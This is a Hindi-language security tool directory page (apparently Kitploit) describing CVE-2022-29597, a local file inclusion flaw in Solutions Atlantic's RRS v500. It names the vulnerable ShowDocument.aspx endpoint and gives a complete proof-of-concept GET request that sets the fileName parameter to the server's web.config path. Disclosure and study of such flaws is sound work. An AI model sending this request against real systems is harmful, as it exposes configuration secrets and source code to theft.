Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-29597 — RRS v500 एप्लिकेशन एक Local File Inclusion (LFI) भेद्यता के प्रति संवेदनशील है। | Kitploit
उपकरण/GitHubGitHub/thegetch/cve-2022-29597
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubthegetch/cve-2022-29597

CVE-2022-29597

RRS v500 एप्लिकेशन एक Local File Inclusion (LFI) भेद्यता के प्रति संवेदनशील है।

रिपॉजिटरी देखें
4 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-29597: RSS v500 में स्थानीय फ़ाइल समावेशन

सॉल्यूशंस अटलांटिक द्वारा RRS v500 एप्लिकेशन में स्थानीय फ़ाइल समावेशन (LFI) कमजोरी मौजूद है। कोई भी प्रमाणित उपयोगकर्ता /RRSWeb/maint/ShowDocument/ShowDocument.aspx पृष्ठ पर किए गए अनुरोधों में आंतरिक सिस्टम फ़ाइलों को संदर्भित कर सकता है। सर्वर अनुरोधित आंतरिक सिस्टम फ़ाइल की सामग्री के साथ सफलतापूर्वक प्रतिक्रिया देगा। यह क्षमता विरोधियों को अंतर्निहित फ़ाइल सिस्टम से संवेदनशील डेटा और/या फ़ाइलें निकालने, सिस्टम के आंतरिक कार्यों के बारे में जानकारी प्राप्त करने या एप्लिकेशन के स्रोत कोड तक पहुंचने की अनुमति दे सकती है।

Mitre URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29597

NIST URL: https://nvd.nist.gov/vuln/detail/CVE-2022-29597

प्रमाण की अवधारणा (POC):

दस्तावेज़ दिखाएँ कार्यक्षमता:

प्रभावित URL:

  • /RRSWeb/maint/ShowDocument/ShowDocument.aspx

RRS साइट से PDF खोलते या डाउनलोड करते समय, प्रभावित URL पर एक अनुरोध किया जाता है जिसमें fileName पैरामीटर शामिल होता है। इस पैरामीटर को संशोधित करके एक आंतरिक सिस्टम पथ, जैसे , शामिल किया जा सकता है। सर्वर तब अनुरोधित फ़ाइल प्रस्तुत करेगा।

web.config

web.config के आंतरिक पथ के साथ GET अनुरोध:

root@kitploit:~
GET /RRSWeb/maint/ShowDocument/ShowDocument.aspx?fileName=C:\\Program%20Files\\Solutions%20Atlantic\\RRS\\RRSWeb\\web.config HTTP/1.1
Host: <REDACTED>
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://<REDACTED>/RRSweb/default.aspx
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: _ga=<REDACTED>; ASP.NET_SessionId=<REDACTED>
Connection: Keep-Alive


सर्वर प्रतिक्रिया:

RRS_LFI_web.config

खोज

अप्रैल 2022

  • Eric Getchell - TheGetch
टूल डाउनलोड करें